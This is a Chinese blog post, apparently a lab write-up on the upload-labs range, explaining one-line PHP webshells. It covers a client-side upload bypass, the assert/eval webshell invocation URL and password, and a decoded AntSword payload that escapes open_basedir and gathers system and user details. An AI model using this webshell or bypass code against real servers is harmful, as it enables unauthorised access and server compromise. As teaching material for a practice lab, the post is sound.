devbox
小蓝xlanll
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

文件上传漏洞------一句话木马原理解析

作者:小蓝xlanll | 2024-06-16 00:21:37

文件上传漏洞------一句话木马原理解析

目录

一、实验环境

二、实验过程

构造一句话木马

一句话木马的使用:

木马原理解析:

一、实验环境

小皮面板搭建:upload-labs靶场

二、实验过程

构造一句话木马

这是一个最简单的一句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。这里是因为assert只能执行函数,不能执行字符串形式的参数。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?显然不能,所以这里我们使用了传参来构建一句话木马。

一句话木马的使用:

这里以第一关为例:

我们上传发现不允许php文件上传,根据弹窗很明显发现这是一个白名单限制,我们看看源码。这个网站的防御规则很清晰了,他是在前端防御,谷歌浏览器提供一个不加载JavaScript的功能。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来复制图片地址根据一句话木马的构造思路进行传参。发现木马执行了phpinfo(),这究竟是为什么呢?我们一起来看看它的原理吧!

木马原理解析:

思路:先利用中国蚁剑进行连接,在进行抓包看看究竟有什么东西。

  1. url:http://10.5.50.55/upload-labs/upload/web.php?0=assert&1=eval($_POST['muma'])
  2. 密码:muma

添加成功,点击左上角AntSword设置网站代理:127.0.0.1端口:8080

接下来就开始抓包了。抓到了,完了我将它进行转码看看究竟是什么吧

  1. @ini_set("display_errors", "0");
  2. @set_time_limit(0);
  3.  
  4. $opdir = @ini_get("open_basedir");
  5. if ($opdir) {
  6.     $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
  7.     $oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
  8.     @array_push($oparr, $ocwd, sys_get_temp_dir());
  9.     foreach ($oparr as $item) {
  10.         if (!@is_writable($item)) {
  11.             continue;
  12.         };
  13.         $tmdir = $item . "/.66b0688826";
  14.         @mkdir($tmdir);
  15.         if (!@file_exists($tmdir)) {
  16.             continue;
  17.         }
  18.         $tmdir = realpath($tmdir);
  19.         @chdir($tmdir);
  20.         @ini_set("open_basedir", "..");
  21.         $cntarr = @preg_split("/\\\\|\//", $tmdir);
  22.         for ($i = 0; $i < sizeof($cntarr); $i++) {
  23.             @chdir("..");
  24.         };
  25.         @ini_set("open_basedir", "/");
  26.         @rmdir($tmdir);
  27.         break;
  28.     };
  29. };
  30.  
  31. function asenc($out)
  32. {
  33.     return $out;
  34. };
  35.  
  36. function asoutput()
  37. {
  38.     $output = ob_get_contents();
  39.     ob_end_clean();
  40.     echo "9a4f" . "2074";
  41.     echo @asenc($output);
  42.     echo "05c31" . "7aefb";
  43. }
  44.  
  45. ob_start();
  46. try {
  47.     $D = dirname($_SERVER["SCRIPT_FILENAME"]);
  48.     if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
  49.     $R = "{$D}    ";
  50.     if (substr($D, 0, 1) != "/") {
  51.         foreach (range("C", "Z") as $L)
  52.             if (is_dir("{$L}:")) $R .= "{$L}:";
  53.     } else {
  54.         $R .= "/";
  55.     }
  56.     $R .= "    ";
  57.     $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
  58.     $s = ($u) ? $u["name"] : @get_current_user();
  59.     $R .= php_uname();
  60.     $R .= "    {$s}";
  61.     echo $R;
  62. } catch (Exception $e) {
  63.     echo "ERROR://" . $e->getMessage();
  64. };
  65. asoutput();
  66. die();

解完码之后是这串代码,这段代码的功能包括:

  1. 禁用 PHP 错误显示(通过 ini_set("display_errors", "0")
  2. 设置脚本执行时间不限制(通过 set_time_limit(0)
  3. 尝试获取当前 PHP 配置中的 open_basedir 设置,并对其进行一系列操作:检查是否存在可写目录,并在其中创建一个名为 .66b0688826 的隐藏目录尝试移动到该目录,并修改 open_basedir 设置以访问上层目录移除创建的隐藏目录
  4. 定义了两个函数 asencasoutput,但它们在代码中并没有被直接调用
  5. 尝试获取服务器信息和当前用户信息,并输出到页面上       
muma=%40eval(%40base64_decode(%24_POST%5B'u91112c5bcc0a7'%5D))%3B

这串代码是在对上一个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是一句话木马的总体原理。我们通过右边可以发现我们的盘符、系统等信息都被爆出来了。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小蓝xlanll/article/detail/724426
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号